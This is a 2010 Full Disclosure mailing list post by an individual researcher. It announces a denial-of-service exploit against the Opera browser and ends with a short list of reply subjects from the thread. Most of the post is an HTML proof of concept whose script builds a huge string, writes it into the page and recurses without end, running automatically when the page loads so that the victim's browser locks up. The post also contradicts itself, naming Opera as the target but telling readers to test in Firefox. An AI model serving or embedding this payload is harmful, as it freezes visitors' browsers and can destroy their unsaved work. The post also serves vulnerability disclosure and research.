Full Disclosure mailing list archives
Opera (plenitude String )Denial of Service Exploit
From: information security <informationhacker08 () gmail com>
Date: Tue, 2 Mar 2010 20:04:19 -0800
======================================================================
Opera (plenitude String )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08 () gmail com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download http://www.opera.com/download/
#Background
Opera is a popular internet browser :)
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
========================================================================================================================
asheesh.html
========================================================================================================================
<html>
<title>asheesh kumar mani tripathi</title>
Asheesh kumar Mani Tripathi
<head>
<script>
function asheesh ()
{
var i , anaconda = "XXXX"
for(i=24;i >0 ;--i)
{
anaconda=anaconda+anaconda;
}
document.write(anaconda);
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
========================================================================================================================
Why do you worry without cause? Whom do you fear without reason? Who
can kill you?
The soul is neither born, nor does it die.
#If you have any questions, comments, or concerns, feel free to contact me.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Opera (plenitude String )Denial of Service Exploit information security (Mar 02)
- Re: Opera (plenitude String )Denial of Service Exploit Jeff Williams (Mar 02)
- Re: Opera (plenitude String )Denial of Service Exploit information security (Mar 03)
- Re: Opera (plenitude String )Denial of Service Exploit Jeff Williams (Mar 03)
- Re: Opera (plenitude String )Denial of Service Exploit information security (Mar 03)
- Re: Opera (plenitude String )Denial of Service Exploit Jeff Williams (Mar 02)